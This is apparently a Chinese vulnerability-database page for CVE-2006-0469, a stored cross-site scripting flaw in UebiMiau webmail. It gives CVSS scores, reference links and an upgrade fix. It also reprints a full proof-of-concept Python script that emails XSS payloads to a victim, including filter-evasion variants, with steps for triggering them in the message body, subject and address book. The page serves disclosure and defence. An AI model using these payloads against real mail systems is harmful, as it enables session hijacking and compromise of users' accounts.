CVE-2006-0469
CVSS4.3
发布时间 :2006-01-30 13:03:00
修订时间 :2011-03-07 21:30:05
NMCOE    

[原文]Cross-site scripting (XSS) vulnerability in UebiMiau 2.7.9, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG tag.


[CNNVD]UebiMiau HTML电子邮件跨站脚本攻击漏洞(CNNVD-200601-362)

        UebiMiau 2.7.9及更早版本中存在跨站脚本攻击(XSS)漏洞,远程攻击者可以通过IMG标记的SRC属性中的javascript: URI注入任意Web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0469
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0469
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-362
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24375
(UNKNOWN)  XF  uebimiau-html-xss(24375)
http://www.vupen.com/english/advisories/2006/0388
(UNKNOWN)  VUPEN  ADV-2006-0388
http://www.uebimiau.org/news.php
(UNKNOWN)  CONFIRM  http://www.uebimiau.org/news.php
http://www.securityfocus.com/bid/16413
(UNKNOWN)  BID  16413
http://www.securityfocus.com/archive/1/archive/1/423437/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060129 UebiMiau Webmail System Security Vulnerability
http://secunia.com/advisories/18655
(UNKNOWN)  SECUNIA  18655
http://securityreason.com/securityalert/387
(UNKNOWN)  SREASON  387

- 漏洞信息

UebiMiau HTML电子邮件跨站脚本攻击漏洞
中危 跨站脚本
2006-01-30 00:00:00 2007-06-01 00:00:00
远程  
        UebiMiau 2.7.9及更早版本中存在跨站脚本攻击(XSS)漏洞,远程攻击者可以通过IMG标记的SRC属性中的javascript: URI注入任意Web脚本或HTML。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,厂商发布了相关更新。

- 漏洞信息 (20675)

Uebimiau Webmail 2.7.2 Stored XSS (EDBID:20675)
php webapps
2012-08-20 Not Verified
0 Shai rod
[点击下载] [点击下载]
#!/usr/bin/python

'''
# Exploit Title: Uebimiau Webmail Stored XSS
# Date: 17/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://www.uebimiau.org/
# Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip
# Version: 2.7.2
 
#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar


About the Application:
======================

Uebimiau is an universal webmail developed in PHP by Aldoir Ventura.
It is free and can be installed in any email server.

-It runs under any System;
-It doesn't require any extra PHP modules;
-Doesn't need a database (as MySQL, PostreSQL,etc)
-Doesn't need IMAP, but compatible with POP3 and IMAP
-Compatible with the MIME Standard (send/receive text/html emails);
-Doesn't need cookies;
-Easy installation. You only modify one file;
-Compatible with Apache, PHP, Sendmail or QMAIL;
-Can be easily translated into any language (already translated in 17 languages);
-Can use a variety of skins




Vulnerability Description
=========================


1. Stored XSS in e-mail body.

XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>

Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered.


2. Stored XSS in "Title" field ( works when victim opens message in full view).

XSS Payload: SubjectGoesHere"><img src='1.jpg'onerror=javascript:alert("XSS")>

This one requires you to send at least 2 messages to the victim with the payload in the email subject.

Location of injection in page source:

<a class="menu" href="readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5" 
title="Uebimiau Webmail Stored XSS POC "><img src='1.jpg'onerror=javascript:alert("XSS")>">Next</a> :: 
<a class="menu" href="javascript:goback()">Back</a> ::

3. Stored XSS in Address Book

XSS Payload: <script>alert("XSS")</script>

Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts.

'''

import smtplib

print "###############################################"
print "#      Uebimiau Webmail Stored XSS POC        #"
print "#            Coded by: Shai rod               #"
print "#               @NightRang3r                  #"
print "#           http://exploit.co.il              #"
print "#       For Educational Purposes Only!        #"
print "###############################################\r\n"

# SETTINGS

sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server  = "10.0.0.5"
smtp_port = 25
subject = "Uebimiau Webmail Stored XSS POC"
xss_payload_1 = """ "><img src='1.jpg'onerror=javascript:alert("XSS")>"""
xss_payload_2 =  """<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>"""
# SEND E-MAIL

print "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
       % (sender, ", ".join(recipient), subject + xss_payload_1) )
msg += "Content-type: text/html\n\n"
msg += """Nothing to see here...\r\n"""
msg += xss_payload_2
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
print "[*] Sending Message 1\r"
server.sendmail(sender, recipient, msg)
print "[*] Sending Message 2\r"
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"
		

- 漏洞信息

22807
UebiMiau Webmail HTML Email Body XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-01-28 2006-01-12
2006-01-28 Unknow

- 解决方案

Upgrade to version 2.7.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站